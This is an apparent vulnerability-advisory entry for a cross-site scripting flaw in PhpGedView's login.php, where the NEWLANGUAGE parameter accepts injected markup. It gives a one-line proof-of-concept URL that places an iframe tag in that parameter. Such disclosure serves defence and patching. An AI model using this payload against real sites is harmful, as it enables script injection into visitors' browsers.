PhpGedView Login.PHP Newlanguage Cross-Site Scripting Vulnerability

info
discussion
exploit
solution
references

PhpGedView Login.PHP Newlanguage Cross-Site Scripting Vulnerability

No exploit is required and the following proof of concept is available:

http://www.example.com/phpgedview/login.php?&changelanguage=yes&NEWLANGUAGE=<iframe>